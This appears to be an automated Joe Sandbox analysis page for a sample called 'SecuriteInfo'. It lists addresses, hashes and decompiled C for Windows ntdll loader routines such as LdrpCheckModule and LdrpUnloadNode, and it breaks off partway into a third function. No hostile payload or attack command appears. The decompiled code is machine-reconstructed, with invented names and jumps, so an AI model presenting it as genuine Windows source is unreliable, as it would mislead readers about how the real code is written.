                                                    0x1d7ee4d6
                                                    0x1d78fa37
                                                    0x1d78fa37
                                                    0x00000000
                                                    0x1d78fa37
                                                    0x1d7ee4dc
                                                    0x1d7ee4e1
                                                    0x1d7ee4e3
                                                    0x1d7ee4e9
                                                    0x1d7ee4eb
                                                    0x1d7ee4eb
                                                    0x1d7ee4f2
                                                    0x1d7ee4f9
                                                    0x1d7ee504
                                                    0x1d7ee505
                                                    0x1d7ee50c
                                                    0x00000000
                                                    0x1d7ee50c
                                                    0x1d78f8e8
                                                    0x1d7ee516
                                                    0x1d7ee51f
                                                    0x1d7ee525
                                                    0x00000000
                                                    0x1d7ee525
                                                    0x1d78f8ee
                                                    0x1d78f8ee
                                                    0x1d78f8f5
                                                    0x1d7ee530
                                                    0x1d7ee532
                                                    0x1d7ee532
                                                    0x1d78f8fd
                                                    0x1d78f909
                                                    0x1d7ee53c
                                                    0x1d7ee543
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ee54b
                                                    0x1d7ee550
                                                    0x1d7ee552
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d78f90f
                                                    0x1d78f90f
                                                    0x1d78f918
                                                    0x00000000
                                                    0x1d78f91e
                                                    0x1d78f924
                                                    0x1d78f92b
                                                    0x1d78f930
                                                    0x1d78f931
                                                    0x1d78f936
                                                    0x1d78f93c
                                                    0x1d78f93e
                                                    0x1d7ee55d
                                                    0x1d7ee55f
                                                    0x1d7ee563
                                                    0x1d7ee56a
                                                    0x1d7ee578
                                                    0x1d7ee57c
                                                    0x1d7ee581
                                                    0x1d7ee586
                                                    0x1d7ee588
                                                    0x1d7ee59a
                                                    0x1d7ee58a
                                                    0x1d7ee593
                                                    0x1d7ee593
                                                    0x1d7ee59f
                                                    0x1d7ee5a2
                                                    0x1d7ee5a8
                                                    0x1d7ee5ae
                                                    0x1d7ee5ae
                                                    0x1d7ee5b3
                                                    0x1d7ee5b3
                                                    0x1d78f94d
                                                    0x1d78fa0c
                                                    0x1d78f953
                                                    0x1d78f953
                                                    0x1d78f953
                                                    0x1d78f957
                                                    0x1d78fa17
                                                    0x1d78fa1b
                                                    0x1d78fa28
                                                    0x1d78fa2d
                                                    0x1d78fa2d
                                                    0x1d78f95d
                                                    0x1d78f965
                                                    0x1d7ee5c7
                                                    0x1d7ee5cc
                                                    0x1d7ee5ce
                                                    0x1d7ee5d3
                                                    0x1d7ee5d3
                                                    0x1d78f96f
                                                    0x1d78f981
                                                    0x1d78f981
                                                    0x00000000
                                                    0x1d78f987
                                                    0x1d78f98d
                                                    0x1d78f992
                                                    0x1d78f999
                                                    0x00000000
                                                    0x1d78f99b
                                                    0x1d78f99b
                                                    0x1d78f9a0
                                                    0x1d78f9ac
                                                    0x1d7ee5e3
                                                    0x1d78f9b2
                                                    0x1d78f9b2
                                                    0x1d78f9b2
                                                    0x1d78f9b7
                                                    0x1d7ee5ea
                                                    0x1d7ee5f0
                                                    0x1d7ee5f7
                                                    0x1d7ee5fd
                                                    0x1d7ee602
                                                    0x1d7ee604
                                                    0x1d7ee60f
                                                    0x1d7ee60f
                                                    0x1d7ee60f
                                                    0x1d7ee618
                                                    0x1d7ee621
                                                    0x1d7ee622
                                                    0x1d7ee624
                                                    0x1d7ee62c
                                                    0x1d7ee62d
                                                    0x1d7ee631
                                                    0x1d7ee631
                                                    0x1d7ee5f7
                                                    0x1d78f9bd
                                                    0x1d78f9c2
                                                    0x1d78f9ce
                                                    0x1d7ee644
                                                    0x1d78f9d4
                                                    0x1d78f9d4
                                                    0x1d78f9d4
                                                    0x1d78f9d9
                                                    0x1d7ee64b
                                                    0x1d7ee650
                                                    0x1d7ee652
                                                    0x1d7ee65d
                                                    0x1d7ee65d
                                                    0x1d7ee65d
                                                    0x1d7ee666
                                                    0x1d7ee66f
                                                    0x1d7ee670
                                                    0x1d7ee672
                                                    0x1d7ee67a
                                                    0x1d7ee67b
                                                    0x1d7ee67f
                                                    0x1d7ee67f
                                                    0x1d78f9e6
                                                    0x1d7ee692
                                                    0x1d78f9ec
                                                    0x1d78f9ec
                                                    0x1d78f9ec
                                                    0x1d78f9f4
                                                    0x1d78fa3d
                                                    0x1d78fa3d
                                                    0x00000000
                                                    0x1d78f9f4
                                                    0x1d78f999
                                                    0x1d78f918

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 3446177414-3610490719
                                                    • Opcode ID: 81e2d73a137cdf85df32acff08bcddf80cb5faa29d97436c3519dfbf8324bb38
                                                    • Instruction ID: 56d8aa19b02883825fa653ea9b365a30c8a5e60ddb06ff3c383105e0d835dddb
                                                    • Opcode Fuzzy Hash: 81e2d73a137cdf85df32acff08bcddf80cb5faa29d97436c3519dfbf8324bb38
                                                    • Instruction Fuzzy Hash: 8B911972608651EFD306CF24C888B2AF7A5FF85A70F01495AEB45DB292DB34E841C793
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7B0AEB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 56%
                                                    			E1D7B0AEB(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t67;
				signed int _t70;
				signed int _t76;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t84;
				intOrPtr _t89;
				signed int _t90;
				intOrPtr _t93;
				signed char _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t111;
				signed int _t113;
				intOrPtr* _t117;
				signed int _t119;
				intOrPtr* _t120;
				signed int _t121;
				intOrPtr* _t122;
				signed int _t126;
				void* _t130;
				void* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;

				_t134 = 0;
				_t108 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t141 =  *0x1d8868d8 - _t134; // 0x0
				if(_t141 != 0) {
					_v20 = 1;
				}
				if( *0x1d8865f9 == 0) {
					_t136 =  *((intOrPtr*)(_t108 + 4));
					while(1) {
						__eflags = _t136 - _t108;
						if(_t136 == _t108) {
							break;
						}
						_t110 = _t136 - 0x54;
						E1D7C7550(_t136 - 0x54);
						_t136 =  *((intOrPtr*)(_t136 + 4));
					}
					goto L2;
				} else {
					L2:
					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
					E1D79FED0(0x1d8832d8);
					if( *0x1d8865f0 != 0) {
						_t126 =  *0x7ffe0330;
						_t135 =  *0x1d889218; // 0x0
						_t111 = 0x20;
						_t110 = _t111 - (_t126 & 0x0000001f);
						asm("ror edi, cl");
						_t134 = _t135 ^ _t126;
					}
					_t137 = 0;
					_t67 =  *((intOrPtr*)(_t108 + 4));
					_v36 = 0;
					_v32 = _t67;
					if(_t67 == _t108) {
						L11:
						_push(0x1d8832d8);
						E1D79E740(_t110);
						return _t137;
					} else {
						_t113 = _v16 & 0x00000100;
						_v16 = _t113;
						do {
							_t138 = _t67 - 0x54;
							if(_t113 != 0) {
								_t110 = _t138;
								_t70 = E1D786DA6(_t138);
								_v36 = _t70;
								__eflags = _t70;
								if(_t70 < 0) {
									break;
								}
							}
							_t114 = _t138;
							E1D7998DE(_t138, 0);
							if(_t134 != 0) {
								__eflags =  *0x1d8865f8;
								if(__eflags == 0) {
									_t114 = _t134;
									 *0x1d8891e0(_t138);
									 *_t134();
									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
								}
							}
							_t148 = _v20;
							if(_v20 == 0) {
								_t76 =  *(_t138 + 0x28);
								_t114 = _t76;
								_t130 = 0x10;
								_v8 = _t76;
								if(E1D7B1C7D(_t76, _t130, _t148) != 0) {
									_t117 = _v8;
									_t31 = _t117 + 2; // 0x2
									_t131 = _t31;
									do {
										_t78 =  *_t117;
										_t117 = _t117 + 2;
										__eflags = _t78 - _v12;
									} while (_t78 != _v12);
									_t114 = _t117 - _t131 >> 1;
									__eflags =  *0x1d8868d8;
									if( *0x1d8868d8 == 0) {
										_t33 = _t114 + 2; // 0x0
										_t79 = _t33;
									} else {
										_t104 =  *0x1d885d4c; // 0x0
										_t79 = _t104 + 1 + _t114;
									}
									_v28 = _t79;
									_t132 = E1D7A5D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
									_v24 = _t132;
									__eflags = _t132;
									if(_t132 != 0) {
										_t119 =  *0x1d8868d8; // 0x0
										__eflags = _t119;
										if(_t119 == 0) {
											_t120 = _v8;
											_t52 = _t120 + 2; // 0x2
											_v40 = _t52;
											do {
												_t84 =  *_t120;
												_t120 = _t120 + 2;
												__eflags = _t84 - _v12;
											} while (_t84 != _v12);
											_t121 = _t120 - _v40;
											__eflags = _t121;
											_t114 = _t121 >> 1;
											E1D7D88C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
											_t139 = _t139 + 0xc;
											L39:
											 *0x1d8868d8 = _v24;
											 *0x1d885d4c = _v28;
											goto L9;
										}
										_t89 =  *0x1d885d4c; // 0x0
										_t90 = _t89 + _t89;
										__eflags = _t90;
										_v40 = _t90;
										E1D7D88C0(_t132, _t119, _t90);
										_t133 = _v8;
										_t140 = _t139 + 0xc;
										_t122 = _v8;
										_t43 = _t122 + 2; // 0x2
										_v8 = _t43;
										do {
											_t93 =  *_t122;
											_t122 = _t122 + 2;
											__eflags = _t93 - _v12;
										} while (_t93 != _v12);
										_t114 = _v40 + 2;
										E1D7D88C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
										_t139 = _t140 + 0xc;
										E1D7A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d8868d8);
										goto L39;
									} else {
										_t101 =  *0x1d8837c0; // 0x0
										__eflags = _t101 & 0x00000003;
										if((_t101 & 0x00000003) != 0) {
											_push("Failed to allocated memory for shimmed module list\n");
											__eflags = 0;
											_push(0);
											_push("LdrpCheckModule");
											_push(0xaf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E1D80E692();
											_t101 =  *0x1d8837c0; // 0x0
											_t139 = _t139 + 0x14;
										}
										__eflags = _t101 & 0x00000010;
										if((_t101 & 0x00000010) != 0) {
											asm("int3");
										}
										goto L9;
									}
								}
							}
							L9:
							E1D7B0C2C(_t138, 1, _t114);
							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
							E1D7ADF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
							_t113 = _v16;
							_t67 =  *((intOrPtr*)(_v32 + 4));
							_v32 = _t67;
						} while (_t67 != _t108);
						_t137 = _v36;
						goto L11;
					}
				}
			}











































                                                    0x1d7b0af6
                                                    0x1d7b0af8
                                                    0x1d7b0afa
                                                    0x1d7b0afd
                                                    0x1d7b0b00
                                                    0x1d7b0b06
                                                    0x1d7f9ea5
                                                    0x1d7f9ea5
                                                    0x1d7b0b13
                                                    0x1d7b0bd3
                                                    0x1d7b0be3
                                                    0x1d7b0be3
                                                    0x1d7b0be5
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7b0bd8
                                                    0x1d7b0bdb
                                                    0x1d7b0be0
                                                    0x1d7b0be0
                                                    0x00000000
                                                    0x1d7b0b19
                                                    0x1d7b0b19
                                                    0x1d7b0b27
                                                    0x1d7b0b2a
                                                    0x1d7b0b36
                                                    0x1d7b0c0d
                                                    0x1d7b0c15
                                                    0x1d7b0c20
                                                    0x1d7b0c21
                                                    0x1d7b0c23
                                                    0x1d7b0c25
                                                    0x1d7b0c25
                                                    0x1d7b0b3e
                                                    0x1d7b0b40
                                                    0x1d7b0b43
                                                    0x1d7b0b46
                                                    0x1d7b0b4b
                                                    0x1d7b0bc2
                                                    0x1d7b0bc2
                                                    0x1d7b0bc7
                                                    0x1d7b0bd2
                                                    0x1d7b0b4d
                                                    0x1d7b0b50
                                                    0x1d7b0b56
                                                    0x1d7b0b59
                                                    0x1d7b0b59
                                                    0x1d7b0b5e
                                                    0x1d7f9eb1
                                                    0x1d7f9eb3
                                                    0x1d7f9eb8
                                                    0x1d7f9ebb
                                                    0x1d7f9ebd
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f9ec3
                                                    0x1d7b0b66
                                                    0x1d7b0b69
                                                    0x1d7b0b70
                                                    0x1d7b0bec
                                                    0x1d7b0bf3
                                                    0x1d7b0bfa
                                                    0x1d7b0bfc
                                                    0x1d7b0c02
                                                    0x1d7b0c04
                                                    0x1d7b0c04
                                                    0x1d7b0bf3
                                                    0x1d7b0b72
                                                    0x1d7b0b76
                                                    0x1d7b0b78
                                                    0x1d7b0b7b
                                                    0x1d7b0b7f
                                                    0x1d7b0b80
                                                    0x1d7b0b8a
                                                    0x1d7f9ec8
                                                    0x1d7f9ecb
                                                    0x1d7f9ecb
                                                    0x1d7f9ece
                                                    0x1d7f9ece
                                                    0x1d7f9ed1
                                                    0x1d7f9ed4
                                                    0x1d7f9ed4
                                                    0x1d7f9edc
                                                    0x1d7f9ede
                                                    0x1d7f9ee5
                                                    0x1d7f9ef1
                                                    0x1d7f9ef1
                                                    0x1d7f9ee7
                                                    0x1d7f9ee7
                                                    0x1d7f9eed
                                                    0x1d7f9eed
                                                    0x1d7f9ef4
                                                    0x1d7f9f0a
                                                    0x1d7f9f0c
                                                    0x1d7f9f0f
                                                    0x1d7f9f11
                                                    0x1d7f9f4e
                                                    0x1d7f9f54
                                                    0x1d7f9f56
                                                    0x1d7f9fbb
                                                    0x1d7f9fbe
                                                    0x1d7f9fc1
                                                    0x1d7f9fc4
                                                    0x1d7f9fc4
                                                    0x1d7f9fc7
                                                    0x1d7f9fca
                                                    0x1d7f9fca
                                                    0x1d7f9fd0
                                                    0x1d7f9fd0
                                                    0x1d7f9fd3
                                                    0x1d7f9fdd
                                                    0x1d7f9fe2
                                                    0x1d7f9fe5
                                                    0x1d7f9fe8
                                                    0x1d7f9ff0
                                                    0x00000000
                                                    0x1d7f9ff0
                                                    0x1d7f9f58
                                                    0x1d7f9f5d
                                                    0x1d7f9f5d
                                                    0x1d7f9f62
                                                    0x1d7f9f65
                                                    0x1d7f9f6a
                                                    0x1d7f9f6d
                                                    0x1d7f9f70
                                                    0x1d7f9f72
                                                    0x1d7f9f75
                                                    0x1d7f9f78
                                                    0x1d7f9f78
                                                    0x1d7f9f7b
                                                    0x1d7f9f7e
                                                    0x1d7f9f7e
                                                    0x1d7f9f93
                                                    0x1d7f9f9a
                                                    0x1d7f9f9f
                                                    0x1d7f9fb4
                                                    0x00000000
                                                    0x1d7f9f13
                                                    0x1d7f9f13
                                                    0x1d7f9f18
                                                    0x1d7f9f1a
                                                    0x1d7f9f1c
                                                    0x1d7f9f21
                                                    0x1d7f9f23
                                                    0x1d7f9f24
                                                    0x1d7f9f29
                                                    0x1d7f9f2e
                                                    0x1d7f9f33
                                                    0x1d7f9f38
                                                    0x1d7f9f3d
                                                    0x1d7f9f3d
                                                    0x1d7f9f40
                                                    0x1d7f9f42
                                                    0x1d7f9f48
                                                    0x1d7f9f48
                                                    0x00000000
                                                    0x1d7f9f42
                                                    0x1d7f9f11
                                                    0x1d7b0b8a
                                                    0x1d7b0b90
                                                    0x1d7b0b96
                                                    0x1d7b0ba1
                                                    0x1d7b0baa
                                                    0x1d7b0bb2
                                                    0x1d7b0bb5
                                                    0x1d7b0bb8
                                                    0x1d7b0bbb
                                                    0x1d7b0bbf
                                                    0x00000000
                                                    0x1d7b0bbf
                                                    0x1d7b0b4b

                                                    APIs
                                                    Strings
                                                    • LdrpCheckModule, xrefs: 1D7F9F24
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 1D7F9F2E
                                                    • Failed to allocated memory for shimmed module list, xrefs: 1D7F9F1C
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 3446177414-161242083
                                                    • Opcode ID: 3ff9a5784de75b381d57dbb45d98566ecb911aca5986382805016a7d43f75c92
                                                    • Instruction ID: 19dd42b39f44737970524474bc72930ad53b464b60a819655aacfa63cd5d90d6
                                                    • Opcode Fuzzy Hash: 3ff9a5784de75b381d57dbb45d98566ecb911aca5986382805016a7d43f75c92
                                                    • Instruction Fuzzy Hash: 5771FE71A002559FCB16DF68CC84BBEB7F0FB48728F14846EE915E7251E730AA41CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7B9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 66%
                                                    			E1D7B9723(signed int __ecx, void* __edx) {
				char _v4;
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t49;
				signed int _t50;
				signed int _t60;
				signed int _t69;
				signed int _t70;
				intOrPtr _t79;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t85;
				intOrPtr _t86;
				signed int _t87;
				void* _t88;
				signed int _t89;
				signed int _t93;
				signed int _t99;
				signed int* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				intOrPtr* _t105;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_t87 = __ecx;
				_t115 = (_t113 & 0xfffffff8) - 0x14;
				_t110 = __ecx;
				_v16 =  *[fs:0x30];
				_t82 = 0;
				_v12 = __ecx;
				_push(_t103);
				if( *((intOrPtr*)(__ecx + 0x20)) == 0xfffffffc) {
					L9:
					_t13 = _t110 + 0x20;
					 *_t13 =  *(_t110 + 0x20) | 0xffffffff;
					__eflags =  *_t13;
					E1D7BA4E3(_t82, _t87, _t103, _t110,  *_t13);
					L10:
					__eflags =  *0x1d8865f0 - _t82; // 0x0
					if(__eflags != 0) {
						_t99 =  *0x7ffe0330;
						_t83 =  *0x1d889214; // 0x0
						_t88 = 0x20;
						_t87 = _t88 - (_t99 & 0x0000001f);
						asm("ror ebx, cl");
						_t82 = _t83 ^ _t99;
					}
					E1D79FED0(0x1d8832d8);
					_t49 =  *_t110;
					while(1) {
						_v20 = _t49;
						__eflags = _t49 - _t110;
						if(_t49 == _t110) {
							break;
						}
						_t16 = _t49 - 0x54; // 0x77ab36a0
						_t108 = _t16;
						__eflags =  *(_t108 + 0x34) & 0x00000008;
						if(( *(_t108 + 0x34) & 0x00000008) != 0) {
							_push(_t87);
							_t102 = 2;
							E1D7B0C2C(_t108, _t102);
							__eflags = _t82;
							if(_t82 != 0) {
								 *0x1d8891e0(_t108);
								 *_t82();
							}
							_t87 = _t108;
							E1D7998DE(_t87, 1);
							_t79 = _v24;
							__eflags =  *(_t79 + 0x68) & 0x00000100;
							if(( *(_t79 + 0x68) & 0x00000100) != 0) {
								_t87 = _t108;
								E1D8185AA(_t87);
							}
						}
						__eflags =  *0x1d8837c0 & 0x00000005;
						if(__eflags != 0) {
							_t43 = _t108 + 0x24; // -48
							E1D80E692("minkernel\\ntdll\\ldrsnap.c", 0xcdd, "LdrpUnloadNode", 2, "Unmapping DLL \"%wZ\"\n", _t43);
							_t115 = _t115 + 0x18;
						}
						_push(0);
						_push( *((intOrPtr*)(_t108 + 0x18)));
						E1D7BA390(_t82, _t87, _t108, _t110, __eflags);
						_t49 =  *_v28;
					}
					_push(0x1d8832d8);
					_t50 = E1D79E740(_t87);
					while(1) {
						L3:
						_t89 =  *(_t110 + 0x18);
						if(_t89 == 0) {
							break;
						}
						_t104 =  *_t89;
						__eflags = _t104 - _t89;
						if(_t104 != _t89) {
							_t50 =  *_t104;
							 *_t89 = _t50;
						} else {
							_t32 = _t110 + 0x18;
							 *_t32 =  *(_t110 + 0x18) & 0x00000000;
							__eflags =  *_t32;
						}
						__eflags = _t104;
						if(_t104 == 0) {
							break;
						} else {
							L1D7A2330(_t50, 0x1d886668);
							_t86 =  *((intOrPtr*)(_t104 + 4));
							_t35 = _t104 + 8; // 0x8
							_t100 = _t35;
							_t93 =  *(_t86 + 0x1c);
							_t60 =  *_t93;
							_v16 = _t60;
							__eflags = _t60 - _t100;
							if(_t60 == _t100) {
								L27:
								 *_t93 =  *_t100;
								__eflags =  *(_t86 + 0x1c) - _t100;
								if(__eflags == 0) {
									asm("sbb eax, eax");
									_t69 =  ~(_t93 - _t100) & _t93;
									__eflags = _t69;
									 *(_t86 + 0x1c) = _t69;
								}
								_push( &_v4);
								E1D7AD963(_t86, _t86, 0, _t104, _t110, __eflags);
								E1D7A24D0(0x1d886668);
								__eflags = _v12;
								if(_v12 != 0) {
									E1D7B9723(_t86, 0);
								}
								_t50 = E1D7A3BC0( *0x1d885d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E1D7B9938(L1D7A2330(_t50, 0x1d886668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L1D7B9B40(_t85, _t107, _t110, 0x1d8867ac);
							_t29 = _t107 + 0x68; // -68
							L1D7B9B40(_t85, _t107, _t110, 0x1d8867a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E1D7A24D0(0x1d886668);
						if( *0x1d885d70 != 0) {
							E1D7C680F(_t107);
						}
						_t50 = E1D7AD3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}








































                                                    0x1d7b9723
                                                    0x1d7b972b
                                                    0x1d7b9736
                                                    0x1d7b9738
                                                    0x1d7b973c
                                                    0x1d7b973e
                                                    0x1d7b9742
                                                    0x1d7b9747
                                                    0x1d7b97bc
                                                    0x1d7b97bc
                                                    0x1d7b97bc
                                                    0x1d7b97bc
                                                    0x1d7b97c0
                                                    0x1d7b97c5
                                                    0x1d7b97c5
                                                    0x1d7b97cb
                                                    0x1d7b9900
                                                    0x1d7b9908
                                                    0x1d7b9913
                                                    0x1d7b9914
                                                    0x1d7b9916
                                                    0x1d7b9918
                                                    0x1d7b9918
                                                    0x1d7b97d6
                                                    0x1d7b97db
                                                    0x1d7b97dd
                                                    0x1d7b97dd
                                                    0x1d7b97e1
                                                    0x1d7b97e3
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7b97e5
                                                    0x1d7b97e5
                                                    0x1d7b97e8
                                                    0x1d7b97ec
                                                    0x1d7b97ee
                                                    0x1d7b97f1
                                                    0x1d7b97f4
                                                    0x1d7b97f9
                                                    0x1d7b97fb
                                                    0x1d7b9922
                                                    0x1d7b9928
                                                    0x1d7b9928
                                                    0x1d7b9803
                                                    0x1d7b9805
                                                    0x1d7b980a
                                                    0x1d7b980e
                                                    0x1d7b9815
                                                    0x1d7fdade
                                                    0x1d7fdae0
                                                    0x1d7fdae0
                                                    0x1d7b9815
                                                    0x1d7b981b
                                                    0x1d7b9822
                                                    0x1d7fdaea
                                                    0x1d7fdb04
                                                    0x1d7fdb09
                                                    0x1d7fdb09
                                                    0x1d7b9828
                                                    0x1d7b982a
                                                    0x1d7b982d
                                                    0x1d7b9836
                                                    0x1d7b9836
                                                    0x1d7b983a
                                                    0x1d7b983f
                                                    0x1d7b9755
                                                    0x1d7b9755
                                                    0x1d7b9755
                                                    0x1d7b975a
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7b986e
                                                    0x1d7b9870
                                                    0x1d7b9872
                                                    0x1d7b992f
                                                    0x1d7b9931
                                                    0x1d7b9878
                                                    0x1d7b9878
                                                    0x1d7b9878
                                                    0x1d7b9878
                                                    0x1d7b9878
                                                    0x1d7b987c
                                                    0x1d7b987e
                                                    0x00000000
                                                    0x1d7b9884
                                                    0x1d7b9889
                                                    0x1d7b988e
                                                    0x1d7b9891
                                                    0x1d7b9891
                                                    0x1d7b9894
                                                    0x1d7b9897
                                                    0x1d7b9899
                                                    0x1d7b989d
                                                    0x1d7b989f
                                                    0x1d7b98b1
                                                    0x1d7b98b3
                                                    0x1d7b98b5
                                                    0x1d7b98b8
                                                    0x1d7b98c0
                                                    0x1d7b98c2
                                                    0x1d7b98c2
                                                    0x1d7b98c4
                                                    0x1d7b98c4
                                                    0x1d7b98cd
                                                    0x1d7b98d0
                                                    0x1d7b98da
                                                    0x1d7b98df
                                                    0x1d7b98e4
                                                    0x1d7b98e8
                                                    0x1d7b98e8
                                                    0x1d7b98f6
                                                    0x00000000
                                                    0x1d7b98f6
                                                    0x1d7b98a1
                                                    0x1d7b98a3
                                                    0x1d7b98a3
                                                    0x1d7b98a5
                                                    0x1d7b98a7
                                                    0x1d7b98a9
                                                    0x1d7b98a9
                                                    0x1d7b98ad
                                                    0x00000000
                                                    0x1d7b98ad
                                                    0x1d7b987e
                                                    0x1d7b9760
                                                    0x1d7b9762
                                                    0x1d7b976b
                                                    0x1d7b97b5
                                                    0x1d7b97bb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7b976d
                                                    0x1d7b976d
                                                    0x1d7b976d
                                                    0x1d7b976f
                                                    0x1d7b9777
                                                    0x1d7b9782
                                                    0x1d7b978b
                                                    0x1d7b9849
                                                    0x1d7b9852
                                                    0x1d7b9857
                                                    0x1d7b9860
                                                    0x1d7b9865
                                                    0x1d7b9865
                                                    0x1d7b9796
                                                    0x1d7b97a2
                                                    0x1d7fdb13
                                                    0x1d7fdb13
                                                    0x1d7b97aa
                                                    0x1d7b97af
                                                    0x1d7b97b1
                                                    0x00000000
                                                    0x1d7b976d
                                                    0x1d7b974d
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7b9753
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 3446177414-2283098728
                                                    • Opcode ID: 7cec674d6eac8d226796b4436c762f95d65dabfa6531e2a9bd9fb898cf045af6
                                                    • Instruction ID: 90583f8bffe7d53aed851df84e3b08e1afd2a4022c21f2072eba2559122a0e57
                                                    • Opcode Fuzzy Hash: 7cec674d6eac8d226796b4436c762f95d65dabfa6531e2a9bd9fb898cf045af6
                                                    • Instruction Fuzzy Hash: 045126316086529FC715DF38D888B7977E1FB88734F15462EE5668B6A2E730B800CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7CC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E1D7CC640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
